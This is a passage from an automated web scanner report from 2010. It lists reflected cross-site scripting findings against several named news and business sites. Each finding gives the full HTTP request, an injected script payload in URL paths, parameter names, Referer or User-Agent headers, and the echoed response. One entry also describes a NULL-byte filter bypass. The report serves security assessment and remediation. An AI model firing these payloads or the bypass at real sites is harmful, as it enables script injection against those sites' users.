User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 404 Not Found
Date: Mon, 13 Dec 2010 03:23:27 GMT
Server: Apache
Cache-Control: no-cache, max-age=0
Expires: Mon, 13 Dec 2010 03:23:27 GMT
Last-Modified: Tue, Jan 27 2099 23:59:59 GMT
Pragma: no-cache
X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ]
Set-Cookie: JSESSIONID=B0ET3VANLB55JQE1GHPCKHWATMY32JVN; path=/
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
Connection: close
Content-Type: text/html
Vary: Accept-Encoding, User-Agent
Content-Length: 32206
<!-- IsEmpty true --> <!-- Check to see if this is an old story link (story/IWK20020101S001 for example) --> <SCRIPT LANGUAGE="javascript">var found="false"; // global variable to determine if a mat ...[SNIP]... <a href="http://adserver.adtechus.com/adlink/3.0/5242.1/1199874/0/16/ADTECH;alias=;key=/newsa1b60"><script>alert(1)</script>31a60ca3d79/infrastruc;kvarticleid=;kvauthor=;loc=300;grp=779367181" target="_blank"> ...[SNIP]...
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 12c04'-alert(1)-'6b0a2437397 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /news/infrastructure12c04'-alert(1)-'6b0a2437397/ethernet/showArticle.jhtml HTTP/1.1
Host: www.informationweek.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 404 Not Found
Date: Mon, 13 Dec 2010 03:23:38 GMT
Server: Apache
Cache-Control: no-cache, max-age=0
Expires: Mon, 13 Dec 2010 03:23:38 GMT
Last-Modified: Tue, Jan 27 2099 23:59:59 GMT
Pragma: no-cache
X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ]
Set-Cookie: JSESSIONID=SF3ERL5Q5RXN5QE1GHOSKH4ATMY32JVN; path=/
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
Connection: close
Content-Type: text/html
Vary: Accept-Encoding, User-Agent
Content-Length: 32166
<!-- IsEmpty true --> <!-- Check to see if this is an old story link (story/IWK20020101S001 for example) --> <SCRIPT LANGUAGE="javascript">var found="false"; // global variable to determine if a mat ...[SNIP]... <scr'+'ipt language="javascript1.1" charset="utf-8" src="http://adserver.adtechus.com/addyn/3.0/5242.1/1199874/0/16/ADTECH;alias=;key=/news/infrastructure12c04'-alert(1)-'6b0a2437397/ethernet/s;kvarticleid=;kvauthor=;loc=100;target=_blank;grp=625889978;misc='+new Date().getTime()+'"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6b9e9"><img%20src%3da%20onerror%3dalert(1)>7b0b85e0d74 was submitted in the REST URL parameter 2. This input was echoed as 6b9e9"><img src=a onerror=alert(1)>7b0b85e0d74 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /news/infrastructure6b9e9"><img%20src%3da%20onerror%3dalert(1)>7b0b85e0d74/ethernet/showArticle.jhtml HTTP/1.1
Host: www.informationweek.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 404 Not Found
Date: Mon, 13 Dec 2010 03:23:37 GMT
Server: Apache
Cache-Control: no-cache, max-age=0
Expires: Mon, 13 Dec 2010 03:23:37 GMT
Last-Modified: Tue, Jan 27 2099 23:59:59 GMT
Pragma: no-cache
X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ]
Set-Cookie: JSESSIONID=HMLO04V5LQ0EBQE1GHOSKH4ATMY32JVN; path=/
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
Connection: close
Content-Type: text/html
Vary: Accept-Encoding, User-Agent
Content-Length: 32244
<!-- IsEmpty true --> <!-- Check to see if this is an old story link (story/IWK20020101S001 for example) --> <SCRIPT LANGUAGE="javascript">var found="false"; // global variable to determine if a mat ...[SNIP]... <IMG height=1 width=1 SRC="http://view.atdmt.com/action/MSFT_TechWeb_AE_ExtData/v3/atc1.informationweek/atc2.infrastructure6b9e9"><img src=a onerror=alert(1)>7b0b85e0d74/atc3./"> ...[SNIP]...
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ab167"><a%20b%3dc>a759730c53e was submitted in the REST URL parameter 3. This input was echoed as ab167"><a b=c>a759730c53e in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags and attributes into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /news/infrastructure/ethernetab167"><a%20b%3dc>a759730c53e/showArticle.jhtml HTTP/1.1
Host: www.informationweek.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 404 Not Found
Date: Mon, 13 Dec 2010 03:23:45 GMT
Server: Apache
Cache-Control: no-cache, max-age=0
Expires: Mon, 13 Dec 2010 03:23:45 GMT
Last-Modified: Tue, Jan 27 2099 23:59:59 GMT
Pragma: no-cache
X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ]
Set-Cookie: JSESSIONID=NVXA05MPZPF4JQE1GHPSKHWATMY32JVN; path=/
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
Connection: close
Content-Type: text/html
Vary: Accept-Encoding, User-Agent
Content-Length: 32152
<!-- IsEmpty true --> <!-- Check to see if this is an old story link (story/IWK20020101S001 for example) --> <SCRIPT LANGUAGE="javascript">var found="false"; // global variable to determine if a mat ...[SNIP]... <a href="http://adserver.adtechus.com/adlink/3.0/5242.1/1199874/0/16/ADTECH;alias=;key=/news/infrastructure/ethernetab167"><a b=c>a759730c53e/show;kvarticleid=;kvauthor=;loc=300;grp=353457811" target="_blank"> ...[SNIP]...
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 20bc0'-alert(1)-'7b1c3c162b8 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /news/infrastructure/ethernet20bc0'-alert(1)-'7b1c3c162b8/showArticle.jhtml HTTP/1.1
Host: www.informationweek.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 404 Not Found
Date: Mon, 13 Dec 2010 03:23:50 GMT
Server: Apache
Cache-Control: no-cache, max-age=0
Expires: Mon, 13 Dec 2010 03:23:50 GMT
Last-Modified: Tue, Jan 27 2099 23:59:59 GMT
Pragma: no-cache
X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ]
Set-Cookie: JSESSIONID=T4253BWY0VAMDQE1GHPCKHWATMY32JVN; path=/
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
Connection: close
Content-Type: text/html
Vary: Accept-Encoding, User-Agent
Content-Length: 32138
<!-- IsEmpty true --> <!-- Check to see if this is an old story link (story/IWK20020101S001 for example) --> <SCRIPT LANGUAGE="javascript">var found="false"; // global variable to determine if a mat ...[SNIP]... <scr'+'ipt language="javascript1.1" charset="utf-8" src="http://adserver.adtechus.com/addyn/3.0/5242.1/1199874/0/16/ADTECH;alias=;key=/news/infrastructure/ethernet20bc0'-alert(1)-'7b1c3c162b8/s;kvarticleid=;kvauthor=;loc=100;target=_blank;grp=579697826;misc='+new Date().getTime()+'"> ...[SNIP]...
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8c1df'-alert(1)-'02f2b0491cd was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /article/202561/mobile_spending_to_pass_wired_broadband_by_2015.html8c1df'-alert(1)-'02f2b0491cd HTTP/1.1
Host: www.pcworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=E12EC249E829AB095F91C860CD3DF86F; Path=/
Content-Type: text/html;charset=UTF-8
Date: Mon, 13 Dec 2010 03:25:39 GMT
Connection: close
Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" ...[SNIP]...
Logon.isValid = '' != Logon.userEmail;
/* Namespace RememberURI */ var RememberURI = new Object(); RememberURI.referer = '/article/202561/mobile_spending_to_pass_wired_broadband_by_2015.html8c1df'-alert(1)-'02f2b0491cd'; if (!RememberURI.referer.match('^/logo') && !RememberURI.referer.match('^/register')) { RememberURI.query = ''; RememberURI.referer += RememberURI.query; document.cookie = "pcw.last_uri=" ...[SNIP]...
1.62. http://www.prepaid-press.com/news_detail.php [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.prepaid-press.com
Path: /news_detail.php
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f8780"-alert(1)-"addb476b639 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /news_detail.php?f8780"-alert(1)-"addb476b639=1 HTTP/1.1
Host: www.prepaid-press.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Date: Mon, 13 Dec 2010 03:26:13 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.3.2
X-Powered-By: PHP/5.3.2
Connection: close
Content-Type: text/html
Content-Length: 15527
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <html> <head> <title>The Prepaid Press</title> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <link href="esti ...[SNIP]... <script type="text/javascript">a2a_linkname=document.title;a2a_linkurl="http://www.prepaid-press.com/news_detail.php?f8780"-alert(1)-"addb476b639=1";</script> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 34526"><script>alert(1)</script>1eb359dd18e was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /content34526"><script>alert(1)</script>1eb359dd18e/fasttakes-china-unicom-ericsson-ntt-docomo-singtel-microsoft HTTP/1.1
Host: www.telecomasia.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 404 Not Found
Date: Mon, 13 Dec 2010 03:29:59 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.13
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: SESSe2542690d25c7f58c482113760c6bb03=esvqalc4r35ogu9mppklrd5sr1; expires=Wed, 05-Jan-2011 07:03:19 GMT; path=/; domain=.telecomasia.net
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Mon, 13 Dec 2010 03:29:59 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 26794
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en"> <head profile="http:// ...[SNIP]... <a href="http://www.telecomasia.net/content34526"><script>alert(1)</script>1eb359dd18e/fasttakes-china-unicom-ericsson-ntt-docomo-singtel-microsoft" > ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 39ef0"><script>alert(1)</script>aeab5dc120e was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /content39ef0"><script>alert(1)</script>aeab5dc120e/fasttakes-kt-ericsson-vodafone-wikileaks HTTP/1.1
Host: www.telecomasia.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 404 Not Found
Date: Mon, 13 Dec 2010 03:29:59 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.13
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: SESSe2542690d25c7f58c482113760c6bb03=duribv5qr4omblp9s20vml5410; expires=Wed, 05-Jan-2011 07:03:19 GMT; path=/; domain=.telecomasia.net
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Mon, 13 Dec 2010 03:29:59 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 26714
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en"> <head profile="http:// ...[SNIP]... <a href="http://www.telecomasia.net/content39ef0"><script>alert(1)</script>aeab5dc120e/fasttakes-kt-ericsson-vodafone-wikileaks" > ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f1e29"><script>alert(1)</script>aa0a7405dce was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /contentf1e29"><script>alert(1)</script>aa0a7405dce/japans-4g-ramp-drive-industry-growth HTTP/1.1
Host: www.telecomasia.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 404 Not Found
Date: Mon, 13 Dec 2010 03:30:00 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.13
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: SESSe2542690d25c7f58c482113760c6bb03=53ukiltcr6cvuesor6266321c5; expires=Wed, 05-Jan-2011 07:03:20 GMT; path=/; domain=.telecomasia.net
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Mon, 13 Dec 2010 03:30:00 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 26698
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en"> <head profile="http:// ...[SNIP]... <a href="http://www.telecomasia.net/contentf1e29"><script>alert(1)</script>aa0a7405dce/japans-4g-ramp-drive-industry-growth" > ...[SNIP]...
1.66. http://www.von.com/news/2010/08/mobile-data-crunch-spurs-billing-dilemma.aspx [name of an arbitrarily supplied request parameter]
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1e8e4"%3balert(1)//a9d9f2e652b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 1e8e4";alert(1)//a9d9f2e652b in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /news/2010/08/mobile-data-crunch-spurs-billing-dilemma.aspx?1e8e4"%3balert(1)//a9d9f2e652b=1 HTTP/1.1
Host: www.von.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml">
<head id="Head1"><meta http-equiv="X ...[SNIP]... <!-- /* You may give each page an identifying name, server, and channel on the next lines. */ s.pageName="/news/2010/08/mobile-data-crunch-spurs-billing-dilemma.aspx?1e8e4";alert(1)//a9d9f2e652b=1"; //document.title s.server="" s.channel="" s.pageType="" s.prop1="" s.prop2="" s.prop3="" s.prop4="" s.prop5="" /* E-commerce Variables */ s.campaign="" s.state="" s.zip="" s.events="" ...[SNIP]...
The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %00ad375"><a>73332b4105 was submitted in the Referer HTTP header. This input was echoed as ad375"><a>73332b4105 in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks, but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request
GET /p/news-articles/wireless-news/mi_hb5558/is_20100531/pyramid-prepaid-mobile-broadband-common/ai_n53830932/ HTTP/1.1
Host: findarticles.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: %00ad375"><a>73332b4105
The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8df4d"><a>78a58864522 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /p/news-articles/wireless-news/mi_hb5558/is_20100706/pyramid-research-players-push-quad/ai_n54327540/ HTTP/1.1
Host: findarticles.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: 8df4d"><a>78a58864522
The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f627d"><a>0e95866a29f was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /p/news-articles/wireless-news/mi_hb5558/is_20100721/pyramid-research-taiwan-operators-focus/ai_n54504589/ HTTP/1.1
Host: findarticles.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: f627d"><a>0e95866a29f
The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 60959"><script>alert(1)</script>17effffa176 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /news/banking/Updated_regulations_necessary_to_catalyze_mobile_banking,_says_study1 HTTP/1.1
Host: member.bnamericas.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=60959"><script>alert(1)</script>17effffa176
The value of the User-Agent HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d95e3"><script>alert(1)</script>b70c0eb3229 was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /news/banking/Updated_regulations_necessary_to_catalyze_mobile_banking,_says_study1 HTTP/1.1
Host: member.bnamericas.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)d95e3"><script>alert(1)</script>b70c0eb3229
Connection: close
The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fcb18"><script>alert(1)</script>f8ffc730b44 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /news/telecommunications/FEATURE:_Mobile_TV_misses_the_boat_for_South_Africa,_but_apps_and_LCDs_jump_on_board HTTP/1.1
Host: member.bnamericas.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=fcb18"><script>alert(1)</script>f8ffc730b44
The value of the User-Agent HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c9548"><script>alert(1)</script>c61da699167 was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /news/telecommunications/FEATURE:_Mobile_TV_misses_the_boat_for_South_Africa,_but_apps_and_LCDs_jump_on_board HTTP/1.1
Host: member.bnamericas.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)c9548"><script>alert(1)</script>c61da699167
Connection: close
The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d35bb"><script>alert(1)</script>96810b01ed8 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /bookmark.php HTTP/1.1
Host: www.addthis.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=d35bb"><script>alert(1)</script>96810b01ed8
Response
HTTP/1.1 200 OK
Date: Mon, 13 Dec 2010 03:17:40 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Set-Cookie: Coyote-2-a0f0083=a0f022f:0; path=/
Content-Length: 92202
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>AddThis Social Bookm ...[SNIP]... <input type="hidden" id="url" name="url" value="http://www.google.com/search?hl=en&q=d35bb"><script>alert(1)</script>96810b01ed8" /> ...[SNIP]...
The value of the Referer HTTP header is copied into the HTML document as plain text between tags. The payload 44360<script>alert(1)</script>65a4ba6ef40 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /bookmark.php HTTP/1.1
Host: www.addthis.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=44360<script>alert(1)</script>65a4ba6ef40
Response
HTTP/1.1 200 OK
Date: Mon, 13 Dec 2010 03:17:41 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Set-Cookie: Coyote-2-a0f0083=a0f021f:0; path=/
Content-Length: 92188
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>AddThis Social Bookm ...[SNIP]... <h4>44360<script>alert(1)</script>65a4ba6ef40 - Google search</h4> ...[SNIP]...
The value of the User-Agent HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f8024"-alert(1)-"426e85a8bf2 was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /feed/showArticle.jhtml HTTP/1.1
Host: www.financetech.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)f8024"-alert(1)-"426e85a8bf2
Connection: close
Response (redirected)
HTTP/1.1 404 Not Found
Date: Mon, 13 Dec 2010 03:22:34 GMT
Server: Apache
Cache-Control: no-cache, max-age=0
Expires: Mon, 13 Dec 2010 03:22:34 GMT
Last-Modified: Tue, Jan 27 2099 23:59:59 GMT
Pragma: no-cache
